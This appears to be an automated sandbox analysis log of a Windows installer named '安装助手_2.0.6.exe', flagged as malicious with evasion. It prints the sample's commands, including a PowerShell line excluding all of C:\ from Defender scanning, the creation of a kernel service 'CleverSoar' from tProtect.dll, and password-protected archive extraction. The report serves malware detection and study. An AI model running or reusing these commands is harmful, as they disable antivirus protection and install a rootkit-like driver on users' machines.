Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADF5C0 6_2_6CADF5C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD96E0 6_2_6CAD96E0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEF640 6_2_6CAEF640
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACB650 6_2_6CACB650
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF37C0 6_2_6CAF37C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF9700 6_2_6CAF9700
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA73092 6_2_6CA73092
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADF050 6_2_6CADF050
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD71F0 6_2_6CAD71F0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADD280 6_2_6CADD280
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADD380 6_2_6CADD380
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE6AF0 6_2_6CAE6AF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE3750 6_2_6CAE3750
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B381EC 10_2_00B381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B781C0 10_2_00B781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B64250 10_2_00B64250
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B88240 10_2_00B88240
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8C3C0 10_2_00B8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B804C8 10_2_00B804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B68650 10_2_00B68650
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6C950 10_2_00B6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B40943 10_2_00B40943
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B68C20 10_2_00B68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B84EA0 10_2_00B84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B80E00 10_2_00B80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B510AC 10_2_00B510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7D089 10_2_00B7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75180 10_2_00B75180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6D1D0 10_2_00B6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B891C0 10_2_00B891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B81120 10_2_00B81120
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D2C0 10_2_00B8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B553F3 10_2_00B553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF53CF 10_2_00AF53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B3D496 10_2_00B3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B854D0 10_2_00B854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D470 10_2_00B8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF1572 10_2_00AF1572
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B81550 10_2_00B81550
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7D6A0 10_2_00B7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B49652 10_2_00B49652
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF97CA 10_2_00AF97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B09766 10_2_00B09766
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8D9E0 10_2_00B8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF1AA1 10_2_00AF1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75E80 10_2_00B75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B75F80 10_2_00B75F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0E00A 10_2_00B0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B722E0 10_2_00B722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B92300 10_2_00B92300
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B5E49F 10_2_00B5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B725F0 10_2_00B725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6A6A0 10_2_00B6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B666D0 10_2_00B666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8E990 10_2_00B8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B72A80 10_2_00B72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B4AB11 10_2_00B4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B76CE0 10_2_00B76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B770D0 10_2_00B770D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6B180 10_2_00B6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B5B121 10_2_00B5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B87200 10_2_00B87200
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7F3A0 10_2_00B7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B1B3E4 10_2_00B1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8F3C0 10_2_00B8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B7F420 10_2_00B7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B67410 10_2_00B67410
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B8F599 10_2_00B8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B83530 10_2_00B83530
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B9351A 10_2_00B9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6F500 10_2_00B6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B93601 10_2_00B93601
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B63790 10_2_00B63790
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B877C0 10_2_00B877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B1F8E0 10_2_00B1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6F910 10_2_00B6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B77AF0 10_2_00B77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B43AEF 10_2_00B43AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0BAC9 10_2_00B0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B0BC92 10_2_00B0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B77C50 10_2_00B77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B6FDF0 10_2_00B6FDF0
Enables security privileges
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: String function: 6CAF6F10 appears 728 times
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: String function: 6CA59240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00B8FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00AF28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00AF1E40 appears 171 times
PE file contains executable resources (Code or Archives)
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
PE file contains more sections than normal
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr Static PE information: Number of sections : 11 > 10
Sample file is different than original file name gathered from version info
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007F23A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000000.2078119623.0000000000639000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.00000000034AE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.6.exe
Uses 32bit PE files
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr Binary string: \Device\TfKbMonPWLCache
Source: classification engine Classification label: mal88.evad.winEXE@134/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA25D60
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00AF9313
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00B03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00B03D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 10_2_00AF9252
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW, 6_2_6CA25240
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File created: C:\Program Files (x86)\Windows NT\is-QJ471.tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1264:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2212:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6500:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3056:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6516:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3012:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3656:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20432,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp "C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp" /SL5="$20442,4753239,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe" /VERYSILENT
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
